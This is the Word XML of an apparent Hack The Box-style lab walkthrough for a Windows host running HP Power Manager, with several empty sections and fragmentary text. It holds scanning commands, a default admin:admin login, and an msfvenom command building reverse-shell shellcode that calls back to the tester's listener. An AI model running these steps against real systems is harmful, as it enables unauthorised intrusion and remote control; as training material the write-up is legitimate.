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6FE76" w14:textId="264FCE6A" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843DCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB Machine: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D04FF3" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRPr="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2336EAB7" w14:textId="531C7167"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1. Machine Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD73D3C" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRPr="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843DCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Short Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB22895" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B9A771" w14:textId="55C9EFC0"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2. Enumeration</w:t>
      </w:r>
      <w:r w:rsidR="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52595731" w14:textId="14B2D6C5" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843DCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap Scan Command:</w:t>
      </w:r>
      <w:r w:rsidR="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F386F" w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap --open 192.168.245.45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4645AC2A" w14:textId="3B8ED0C2" w:rsidR="001F386F" w:rsidRPr="00843DCE" w:rsidRDefault="001F386F" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap -sVC -vvv 192.168.245.45 --script vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52999D37" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E2A5C3" w14:textId="12689E9D"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3. Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971789" w14:textId="1B421727" w:rsidR="00843DCE" w:rsidRDefault="001F386F" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smbmap -H 192.168.245.45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F738E27" w14:textId="77777777" w:rsidR="001F386F" w:rsidRPr="001F386F" w:rsidRDefault="001F386F" w:rsidP="001F386F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 3389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71317D37" w14:textId="77777777" w:rsidR="001F386F" w:rsidRPr="001F386F" w:rsidRDefault="001F386F" w:rsidP="001F386F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system to test them because most of the times, this is the way to go, sysadmins sometimes forget to change them. So we run admin:admin and that’s it we are in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129D9ABF" w14:textId="77777777" w:rsidR="001F386F" w:rsidRPr="001F386F" w:rsidRDefault="001F386F" w:rsidP="001F386F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enumeraing the website we see the following on Help menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4CB91C" w14:textId="77777777" w:rsidR="001F386F" w:rsidRDefault="001F386F" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF7D628" w14:textId="6A3118F3"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4. Code Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC1E3E" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AAABFB4" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78E5BB1E" w14:textId="5EE10C89"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5. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2448A790" w14:textId="77777777" w:rsidR="001F386F" w:rsidRPr="001F386F" w:rsidRDefault="001F386F" w:rsidP="001F386F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>searchsploit Power Manager 4.2 if not results returned search in browser, or change query to be sure of the outcome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12510BAB" w14:textId="77777777" w:rsidR="001F386F" w:rsidRPr="001F386F" w:rsidRDefault="001F386F" w:rsidP="001F386F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>searchsploit HP Power Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="5D38A3DE" w:rsidR="00843DCE" w:rsidRDefault="001F386F" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>And we see exploits avaialable, the word Administration is also keyword for us</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3620FF8B" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CEF4102" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843DCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6. Shell Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A148D" w14:textId="6877879D" w:rsidR="00843DCE" w:rsidRDefault="001F386F" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As we see it is written in exploit that it was tested on Windows Server 2003 Enterprise Edition SP2 and Windows XP SP2, but our host is most likely Windows 7, so we are going to generate a new shellcode. We will use the encoder mentioned in exploit code itself Msf::Encoder::PexAlphaNum more information about this encoder can be found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A34C31D" w14:textId="56E6A4C0" w:rsidR="001F386F" w:rsidRDefault="001F386F" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msfvenom -p windows/shell_reverse_tcp -b “\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a” LHOST=192.168.45.201 LPORT=443 -e x86/alpha_mixed -f c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C12A45F" w14:textId="479DCB54" w:rsidR="001F386F" w:rsidRDefault="001F386F" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rlwrap nc -lvnp 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750B57EC" w14:textId="77777777" w:rsidR="001F386F" w:rsidRPr="001F386F" w:rsidRDefault="001F386F" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7367FE24" w14:textId="4A3FC9B5"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7. Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7271C07B" w14:textId="77777777" w:rsidR="001F386F" w:rsidRPr="001F386F" w:rsidRDefault="001F386F" w:rsidP="001F386F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>With rlwrap (Readline Wrapper), you get a more user-friendly shell-like experience, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F21FE7" w14:textId="77777777" w:rsidR="001F386F" w:rsidRPr="001F386F" w:rsidRDefault="001F386F" w:rsidP="001F386F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Arrow key navigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BEA614" w14:textId="77777777" w:rsidR="001F386F" w:rsidRPr="001F386F" w:rsidRDefault="001F386F" w:rsidP="001F386F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F619D8" w14:textId="77777777" w:rsidR="001F386F" w:rsidRPr="001F386F" w:rsidRDefault="001F386F" w:rsidP="001F386F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Better text editing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034A3F60" w14:textId="77777777" w:rsidR="001F386F" w:rsidRPr="001F386F" w:rsidRDefault="001F386F" w:rsidP="001F386F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Run the exploit on the target host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2DC30" w14:textId="0CCEEA31" w:rsidR="00843DCE" w:rsidRDefault="001F386F" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F386F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shortly after you will receive your desired reverse shell connection as NT Authority System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922CFE8" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27CC4E7C" w14:textId="1F85BFFB"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8. Root Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64214A56" w14:textId="3BA0FA65" w:rsidR="00843DCE" w:rsidRPr="00843DCE" w:rsidRDefault="001F386F" w:rsidP="001F386F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>On Desktop we obtain proof.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0D8C61" w14:textId="77777777" w:rsidR="00A311DF" w:rsidRPr="00843DCE" w:rsidRDefault="00A311DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A311DF" w:rsidRPr="00843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A36F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68C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891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AFB"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="001F386F"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00842AAB"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00F57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596D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E03A3A5B-E9F2-43CE-B86B-8D51C3210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A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A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6A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A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A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A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6A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A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A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AFB"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00CE6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AFB"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00CE6AFB"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00CE6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AFB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00CE6A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239</Words>
  <Characters>1363</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>11</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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Manvar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bhavya Manvar</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-12T18:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>